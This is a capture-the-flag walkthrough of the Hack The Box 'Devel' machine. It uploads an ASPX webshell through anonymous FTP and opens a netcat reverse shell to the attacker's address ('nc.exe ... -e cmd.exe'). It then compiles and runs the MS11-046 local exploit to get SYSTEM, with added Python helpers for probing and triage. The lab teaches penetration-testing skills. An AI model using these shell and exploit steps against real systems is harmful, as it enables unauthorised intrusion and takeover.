Devel
Port scan
root@kali:~/HTB/Machines/Devel# nmap -A -T4 -v -oN nmap.txt devel
# Nmap 7.80 scan initiated Thu Nov 14 08:47:20 2019 as: nmap -A -T4 -v -oN nmap.txt devel
Nmap scan report for devel (10.10.10.5)
Host is up (0.044s latency).
rDNS record for 10.10.10.5: devel.htb
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.378 days (since Wed Nov 13 23:43:29 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   44.49 ms 10.10.14.1
2   44.63 ms devel.htb (10.10.10.5)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 14 08:47:38 2019 -- 1 IP address (1 host up) scanned in 18.12 seconds
FTP & web server
The web server only serves the default IIS7 start page. The FTP service is more interesting: it accepts anonymous logins, and its listing (aspnet_client, iisstart.htm, welcome.png) is exactly the content of an IIS web root. If anonymous users can also write there, anything we upload will be served by IIS. We test this by pushing a harmless file to the FTP server.
root@kali:~/HTB/Machines/Devel# cat hello.html
<html>Hello I am in</html>
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put hello.html
local: hello.html remote: hello.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
28 bytes sent in 0.00 secs (379.7743 kB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
11-18-19  12:03AM                   28 hello.html
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> quit
221 Goodbye.
Browsing to /hello.html on the web server returns the file we just uploaded: the FTP root is the IIS web root (c:\inetpub\wwwroot) and anonymous FTP gives us write access to it.
Push a webshell
root@kali:~/HTB/Machines/Devel# cp /usr/share/webshells/aspx/cmdasp.aspx ./
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (11.0903 MB/s)
ftp> quit
221 Goodbye.
Kali ships an ASPX command shell at /usr/share/webshells/aspx/cmdasp.aspx. IIS executes .aspx files placed in the web root, so after the upload, opening /cmdasp.aspx in a browser lets us run commands on the server as the application pool identity (iis apppool\web, as whoami shows later).
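The whole foothold rests on one misconfiguration: the anonymous FTP root is the IIS web root. The following is an added example (not part of the original write-up) that automates the check performed by hand above: it parses the MS-DOS style listing Microsoft ftpd returns, compares it with what the web server serves, and, on a live target, uploads a random marker over FTP, fetches it over HTTP and deletes it again. Host names, the marker file name, the HTTP base URL and the anonymous password are assumptions.

```python
"""Check whether an anonymous-writable FTP root is also the IIS web root.

Added example, not code from the original write-up. Host names, the marker
file name and the HTTP base URL are assumptions; the listing format is the
MS-DOS style listing Microsoft ftpd returned in the nmap ftp-anon output.
"""
import ftplib
import io
import re
import secrets
import urllib.request

# Microsoft ftpd MS-DOS style listing line: date, time, <DIR> or size, name.
_LISTING_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


def parse_msdos_listing(lines):
    """Return {name: size} from Microsoft ftpd LIST output lines.

    Directories map to None; lines that do not match the format are skipped.
    """
    entries = {}
    for line in lines:
        m = _LISTING_RE.match(line.strip())
        if not m:
            continue
        entries[m.group("name")] = None if m.group("dir") else int(m.group("size"))
    return entries


def webroot_overlap(ftp_entries, web_paths):
    """Names from the FTP listing that the web server also serves.

    The comparison is case-insensitive, as NTFS and IIS are.
    """
    ftp_lower = {name.lower(): name for name in ftp_entries}
    return sorted(ftp_lower[p.lower()] for p in web_paths if p.lower() in ftp_lower)


def probe_ftp_to_web(host, http_base, user="anonymous",
                     password="anon@example.com", timeout=10):
    """Upload a random marker over FTP, fetch it over HTTP, then delete it.

    Returns True when the bytes come back unchanged, i.e. the FTP root is the
    web root and anonymous users can write to it. Uses binary mode (STOR via
    storbinary) so no CRLF translation happens on the way up.
    """
    marker = f"probe-{secrets.token_hex(8)}.txt"   # assumed name, random suffix
    payload = secrets.token_bytes(32)
    with ftplib.FTP(host, timeout=timeout) as ftp:
        ftp.login(user, password)
        ftp.storbinary(f"STOR {marker}", io.BytesIO(payload))
        try:
            url = f"{http_base.rstrip('/')}/{marker}"
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                return resp.read() == payload
        finally:
            ftp.delete(marker)   # leave the target as we found it


if __name__ == "__main__":
    # Listing lines copied from the nmap ftp-anon output above.
    listing = [
        "03-18-17  01:06AM       <DIR>          aspnet_client",
        "03-17-17  04:37PM                  689 iisstart.htm",
        "03-17-17  04:37PM               184946 welcome.png",
    ]
    entries = parse_msdos_listing(listing)
    print(webroot_overlap(entries, ["iisstart.htm", "welcome.png"]))
    # On the lab box: print(probe_ftp_to_web("devel", "http://devel"))
```

The offline part (listing parser and overlap) is enough to raise suspicion from the nmap output alone; the live probe confirms write access and the root mapping in one round trip and cleans up after itself, which matters when the same check is run against production hosts.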
Full reverse shell
Download nc for Windows
root@kali:~/HTB/Machines/Devel# wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
--2019-11-14 11:31:01--  https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
Resolving eternallybored.org (eternallybored.org)... 84.255.206.8, 2a01:260:4094:1:42:42:42:42
Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 111892 (109K) [application/zip]
Saving to: ‘netcat-win32-1.12.zip’

netcat-win32-1.12.z 100%[==================>] 109.27K  241KB/s    in 0.5s

2019-11-14 11:31:02 (241 KB/s) - ‘netcat-win32-1.12.zip’ saved [111892/111892]
Unzip the file
root@kali:~/HTB/Machines/Devel# unzip -d netcat netcat-win32-1.12.zip
Archive:  netcat-win32-1.12.zip
  inflating: netcat/doexec.c
  inflating: netcat/getopt.c
  inflating: netcat/netcat.c
  inflating: netcat/generic.h
  inflating: netcat/getopt.h
  inflating: netcat/hobbit.txt
  inflating: netcat/license.txt
  inflating: netcat/readme.txt
  inflating: netcat/Makefile
  inflating: netcat/nc.exe
  inflating: netcat/nc64.exe
root@kali:~/HTB/Machines/Devel# cp netcat/nc.exe ./
Push nc to the server
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
65573 bytes sent in 0.09 secs (715.1759 kB/s)
ftp> bye
221 Goodbye.
Run the listener
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Initiate the reverse shell
Launch the following command from the webshell.
c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe
But it does not work: the command fails with "This program cannot be run in DOS mode", which is the message stored in the DOS stub at the start of every PE executable, so the file reached the server but was no longer a valid PE image.
The cause was the transfer: the ftp client defaulted to ASCII mode, which rewrites every 0x0A byte as 0x0D 0x0A and therefore corrupts binaries. The byte count gives it away: 65573 bytes were sent for a file that is 38616 bytes long. Always switch to binary mode (ftp> bin, confirmed by "200 Type set to I") before uploading executables.
Second transfer of nc.exe, in binary mode
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put nc.exe
local: nc.exe remote: nc.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38616 bytes sent in 0.00 secs (200.1472 MB/s)
ftp> bye
221 Goodbye.
Initiate the reverse shell
Launch the following command from the webshell.
c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe
This time it works!
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49167.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
Reverse shell with InsomniaShell
I originally used this reverse shell instead, because at the time I did not know that the problem was the transfer mode of nc.exe.
Download InsomniaShell
root@kali:~/HTB/Machines/Devel# wget https://www.darknet.org.uk/content/files/InsomniaShell.zip
--2019-11-14 13:32:23--  https://www.darknet.org.uk/content/files/InsomniaShell.zip
Resolving www.darknet.org.uk (www.darknet.org.uk)... 45.79.65.87
Connecting to www.darknet.org.uk (www.darknet.org.uk)|45.79.65.87|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8902 (8.7K) [application/zip]
Saving to: ‘InsomniaShell.zip’

InsomniaShell.zip   100%[==================>]   8.69K  --.-KB/s    in 0s

2019-11-14 13:32:23 (58.5 MB/s) - ‘InsomniaShell.zip’ saved [8902/8902]
Push InsomniaShell to the server
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put InsomniaShell/InsomniaShell.aspx InsomniaShell.aspx
local: InsomniaShell/InsomniaShell.aspx remote: InsomniaShell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
45580 bytes sent in 0.09 secs (504.3878 kB/s)
ftp> bye
221 Goodbye.
Run the reverse shell
Open InsomniaShell.aspx on the web server and start its reverse shell towards the listener on port 5555. On the listening console, the reverse shell is opened.
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49160.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>
Privilege escalation
The banner "Microsoft Windows [Version 6.1.7600]" identifies Windows 7 RTM (build 7600, no service pack). An unpatched build of that era is vulnerable to MS11-046 (CVE-2011-1249), a local elevation of privilege in the Ancillary Function Driver (afd.sys). A public exploit for the 32-bit version is in exploit-db:
root@kali:~# searchsploit MS11-046
-------------------------------------- ----------------------------------------
 Exploit Title                        |  Path
                                      | (/usr/share/exploitdb/)
-------------------------------------- ----------------------------------------
Microsoft Windows (x86) - 'afd.sys' L | exploits/windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local K | exploits/windows/dos/18755.c
-------------------------------------- ----------------------------------------

Shellcodes: No Result
------------------------------- -----------------------------------------------
 Paper Title                   |  Path
                               | (/usr/share/exploitdb-papers/)
------------------------------- -----------------------------------------------
MS11-046 - Dissecting a 0day   | docs/english/18712-ms11-046---dissecting-a-0da
------------------------------- -----------------------------------------------
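The reasoning that picks MS11-046 here (NT version in scope, no fix installed, 32-bit target for exploit 40564) is worth keeping as a repeatable triage step rather than a mental note. The following is an added example, not part of the original write-up: it parses the cmd.exe version banner the Devel shell printed and a `wmic qfe get HotFixID` listing, and reports whether the box is still a candidate. The hotfix list used in the demo is constructed; the KB number for MS11-046 (KB2503665) and the affected NT versions (XP through Windows 7 / Server 2008 R2) come from the bulletin.

```python
"""Triage helper: does an unpatched Windows build look like an MS11-046 target?

Added example, not code from the original write-up. The version banner is the
one the Devel shell printed; the hotfix listing in the demo is constructed.
MS11-046 (CVE-2011-1249) is the afd.sys elevation-of-privilege bug fixed by
KB2503665 on Windows XP / 2003 / Vista / 2008 / 7 / 2008 R2.
"""
import re

MS11_046_KB = "KB2503665"
# Windows 7 / Server 2008 R2 builds: 7600 is RTM, 7601 is SP1.
WIN7_BUILD_TO_SP = {7600: "RTM", 7601: "SP1"}
# NT versions in MS11-046 scope: 5.1 (XP), 5.2 (2003 / XP x64), 6.0 (Vista / 2008), 6.1 (7 / 2008 R2).
AFFECTED_NT_VERSIONS = {(5, 1), (5, 2), (6, 0), (6, 1)}

_VER_RE = re.compile(r"Microsoft Windows \[Version (\d+)\.(\d+)\.(\d+)\]")


def parse_ver_banner(text):
    """Return (major, minor, build) from a cmd.exe banner / 'ver' output, or None."""
    m = _VER_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def installed_hotfixes(wmic_qfe_output):
    """Collect KB identifiers from 'wmic qfe get HotFixID' output."""
    return set(re.findall(r"\bKB\d+\b", wmic_qfe_output))


def ms11_046_candidate(ver_text, wmic_qfe_output, arch="x86"):
    """Return (candidate, reason).

    The public exploit used on this box (exploit-db 40564) is x86-only, so a
    64-bit install is reported as not a candidate for that exploit even when
    the OS itself is in scope.
    """
    ver = parse_ver_banner(ver_text)
    if ver is None:
        return False, "could not parse version banner"
    major, minor, build = ver
    if (major, minor) not in AFFECTED_NT_VERSIONS:
        return False, f"NT {major}.{minor} is not in MS11-046 scope"
    if MS11_046_KB in installed_hotfixes(wmic_qfe_output):
        return False, f"{MS11_046_KB} is installed"
    if arch != "x86":
        return False, "exploit 40564 targets 32-bit Windows only"
    sp = WIN7_BUILD_TO_SP.get(build, "unknown SP") if (major, minor) == (6, 1) else "n/a"
    return True, f"NT {major}.{minor} build {build} ({sp}), {MS11_046_KB} missing"


if __name__ == "__main__":
    ver_banner = "Microsoft Windows [Version 6.1.7600]"   # printed by the Devel shell
    qfe = "HotFixID\nKB971033\nKB2305420\n"                # constructed sample listing
    print(ms11_046_candidate(ver_banner, qfe))
```

On the target the two inputs are `ver` and `wmic qfe get HotFixID`, both available from the low-privilege web shell; the architecture can be read from `echo %PROCESSOR_ARCHITECTURE%`, and the exploit's own "[+] 32-bit / [+] Windows 7" output later confirms the same thing.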
Compile the exploit
The C source is cross-compiled from Kali with mingw-w64 for 32-bit Windows; -lws2_32 links Winsock, which the exploit needs for the AFD socket it abuses.
root@kali:~/HTB/Machines/Devel# cp /usr/share/exploitdb/exploits/windows_x86/local/40564.c ./
root@kali:~/HTB/Machines/Devel# i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
Upload the exploit to the server
Binary mode is set before the put this time.
root@kali:~/HTB/Machines/Devel# ftp devel
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
345251 bytes sent in 0.48 secs (709.0281 kB/s)
ftp> bye
221 Goodbye.
Run the exploit
From the reverse shell (each command appears twice because cmd.exe echoes it back over the socket):
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49163.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot
cd c:\inetpub\wwwroot
c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system
User flag
c:\Windows\System32>cd ..
cd ..
c:\Windows>cd ..
cd ..
c:\>cd Users
cd Users
c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users

18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Administrator
17/03/2017  04:17    <DIR>          babis
18/03/2017  01:06    <DIR>          Classic .NET AppPool
18/11/2019  05:20    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  24.569.319.424 bytes free
c:\Users>cd babis
cd babis
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
<USER FLAG>
Root flag
c:\Users\babis\Desktop>cd ..
cd ..
c:\Users\babis>cd ..
cd ..
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
<ROOT FLAG>
c:\Users\Administrator\Desktop>exit
exit
The exploit's own log only shows up after the SYSTEM shell exits. It confirms the target identification (32-bit Windows 7) and shows the technique: an AFD socket-connect request triggers the bug, and token-stealing shellcode elevates the calling process to SYSTEM before a shell is spawned.
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows 7
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8284c000
[*] Offset: 0x007c0000
[+] HalDispatchTable
[*] Offset: 0x008e93b8
[+] NtQueryIntervalProfile
[*] Address: 0x77865510
[+] ZwDeviceIoControlFile
[*] Address: 0x77864ca0
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
[*] Exiting SYSTEM shell
References
- NetCat for Windows
- InsomniaShell – ASP.NET Reverse Shell Or Bind Shell
- WindowsExploits/MS11-046
- Mingw-w64: How to compile Windows exploits on Kali Linux
Daniel Simao 08:52, 14 November 2019 (EST)